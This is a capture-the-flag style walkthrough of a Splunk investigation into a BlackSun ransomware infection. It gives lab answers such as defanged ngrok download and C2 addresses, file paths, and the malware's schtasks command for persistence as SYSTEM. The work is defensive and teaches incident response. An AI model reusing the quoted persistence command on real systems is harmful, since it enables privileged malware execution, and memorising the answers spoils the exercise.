Splunk
Splunk is a platform which is commonly used these days for ensuring security of networks and devices related to it by monitoring, searching, analyzing and showing the machine-generated data in real time. It is used for indexing and correlating information in such a way that it can be searched easily and it becomes possible to generate alerts, reports and visualization. It helps to analyze large data sets, detect any malicious activity and respond to threats across environments quickly and more accurately than legacy SIEM systems.
Working with Splunk
Working on Splunk depends on the situation. In this case, the task is to check events on Splunk to investigate what occurred on Keegan’s device on Monday, May 16th, 2022 when the client noted that the machine is operational, but some files have a weird file extension. To access Splunk, AttackBox or OpenVPN can be used. The access through VPN can be done by installing OpenVPN Client and using IP address of the machine.
After the machine is connected, the first task is to find out the name of binary of suspicious file. For this, data can be retrieved by selecting some fields such as sourceport, destinationport, destinationip, filepath, filename etc. which will be useful.
If it was downloaded, the port can either be 80 or 443.
If filter for port 80 is applied , it provides information related to powershell.
If this information is decoded(base 64), it reveals the name of binary i.e. OUTSTANDING_GUTTER.exe alongwith the address from which binary was downloaded which can be defanged to get second answer which is hxxp[://]886e-181–215–214–32[.]ngrok[.]io.
The next task is to find the path of windows executable which was used to download the suspicious binary which can be identified by selecting the field “parentimage” which provides the link of powershell.exe
Next task is to find the command which was executed to configure the suspicious binary to run with elevated privileges which can be found by using the base64 decoded value
As per this information, the command used was “C:\Windows\system32\schtasks.exe” /Create /TN OUTSTANDING_GUTTER.exe /TR C:\Windows\Temp\COUTSTANDING_GUTTER.exe /SC ONEVENT /EC Application /MO *[System/EventID=777] /RU SYSTEM /f. This also gives information required for next question which is to find permissions which will suspicious binary run as and command to run the binary i.e, NT AUTHORITY\SYSTEM;”C:\Windows\system32\schtasks.exe” /Run /TN OUTSTANDING_GUTTER.exe
Next task is to find the address of remote server to which binary was connected which can be done by using the field “queryname” which shows an event and if its information can be seen as queryname which if defanged, provides the correct answer i.e., hxxp[://]9030–181–215–214–32[.]ngrok[.]io
Next task is to identify the name of the powershell script which was downloaded to the same location as the suspicious binary which can be done by typing the extension”.ps1” extension in searchbar which gives some results. The hash of all these files can be checked by using any website such as “virustotal” which proves that the only one which is malicious is script.ps1. Thus, the correct answer is ”script.ps1”
The next task is to find the actual name of malicious script which was flagged as malicious. This can be done by using MD5 hash of file in virustotal.com which gives details of the script including its real name i.e., BlackSun.ps1
The next question is to find the full path to which ransomware note was saved which can serve as an IOC. This file can only be a .txt file. Thus, the correct way is to search .txt extension in search bar which shows 3 files. Out of those 3 files, there is only 1 which belongs to “downloads” directory. Hence, the correct answer is C:\Users\keegan\Downloads\vasg6b0wmw029hd\BlackSun_README.txt
The last question is to find the path of image which was saved to disk to replace the user’s desktop wallpaper which can also serve as IOC. This can be done by searching image extension such as .jpg. This provides 2 results in which the one for BlackSun is C:\Users\Public\Pictures\blacksun.jpg
